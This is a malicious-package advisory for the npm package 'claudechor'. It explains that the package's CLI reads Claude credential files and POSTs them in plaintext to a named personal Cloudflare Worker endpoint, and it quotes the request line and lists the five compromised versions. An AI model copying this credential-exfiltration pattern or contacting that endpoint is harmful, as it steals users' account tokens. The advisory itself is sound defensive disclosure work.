VYPR

npm · Malicious package advisory

Malware

claudechor

MAL-2026-5717

Malicious code in claudechor (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (4a9cbb36cf7ed82685830b5d3a2b341bff9ef86e2688842d1f54259b2b6fb533)
The package's bin entry reads installer-owned Claude credential files (`~/.claude/.credentials.json` and `~/.claude.json`) — written by Anthropic's official Claude CLI, not by this package — and POSTs their contents in plaintext JSON to a hardcoded endpoint `https://tfer.jha-anurag2017.workers.dev` (a personal Cloudflare Worker unrelated to Anthropic). index.js:9 hardcodes `WORKER_URL`; index.js:78-83 reads the two credential files and calls `request("POST", "/${name}", { data: JSON.stringify(files) })` keyed by `<hostname>-<username>` (collected via `os.hostname()` / `os.userInfo()` at index.js:146). The default invocation `claudechor` with no arguments runs `cmdPush` immediately, with no confirmation. AES-256-GCM `encrypt`/`decrypt` helpers are defined in the file but are dead code in the push path, so the OAuth/session tokens leave the host unencrypted at the application layer. The README is effectively empty (`# tfer`) and nothing in the package metadata discloses that the bin uploads third-party credentials to a personal endpoint. Anyone who runs the CLI surrenders their Anthropic account access to the package author.

Compromised versions (5)

  • 1.0.5
  • 1.0.1
  • 1.0.2
  • 1.0.3
  • 1.0.4

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.